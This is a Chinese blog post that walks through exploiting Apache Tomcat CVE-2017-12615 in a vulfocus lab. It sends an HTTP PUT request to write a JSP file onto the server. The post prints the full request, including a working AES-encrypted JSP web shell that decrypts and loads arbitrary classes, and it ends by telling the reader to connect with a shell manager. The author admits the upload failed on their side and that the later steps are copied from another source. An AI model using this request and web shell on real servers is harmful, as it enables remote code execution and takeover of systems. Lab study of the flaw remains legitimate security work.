• Tomcat任意文件写入漏洞


    Tomcat任意文件写入漏洞

    参考链接:https://zhishihezi.net/box/c7ecf406d93ed094559f1cd654950609

    靶场:vulfocus

    环境:名称: vulfocus/tomcat-cve_2017_12615

    一、漏洞描述

    Apache Tomcat 7.0.0到7.0.79版本中存在远程代码执行漏洞,当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法时,攻击者可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件,文件中的代码被服务器执行。

    二、影响版本

    Apache Tomcat >=7.0.0,<=7.0.79

    三、漏洞复现

    1、访问给出的地址;192.168.1.177:43999

    2、抓包,然后直接修改为PUT请求方式,并且设置文件名为1.jsp(名字随意),然后在下面直接填充jsp的shell即可,发送成功后,正常情况下服务器应该会返回状态码201,。

    PUT /1.jsp/ HTTP/1.1
    Host: 118.193.36.37:29618
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0
    Content-Length: 611
    <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
    

      

    3、直接访问1.jsp文件,应该是存在的,但是由于我发包的时候服务器没有任何反应(具体的我也不知道发生了什么),如下。

    所以后面的步骤我主要来自:https://zhishihezi.net/box/c7ecf406d93ed094559f1cd654950609

    4、访问1.jsp,存在

    5、使用 shell 管理工具连接即可

     

  • 相关阅读:
    下载及爬取网页内容
    对于for循环的理解
    记录安装fiddle出现的问题
    Django
    12种可以参考的思路关于代码能干什么
    “字符文本中字符太多”错误及解决方法
    jQuery参考:jquery中的$(document).ready()与window.onload的区别
    页面定时刷新功能实现
    HTML:关于位置的几个概念
    Lambda表达式
  • 原文地址:https://www.cnblogs.com/Xor0ne/p/13546875.html
Copyright © 2020-2023  润新知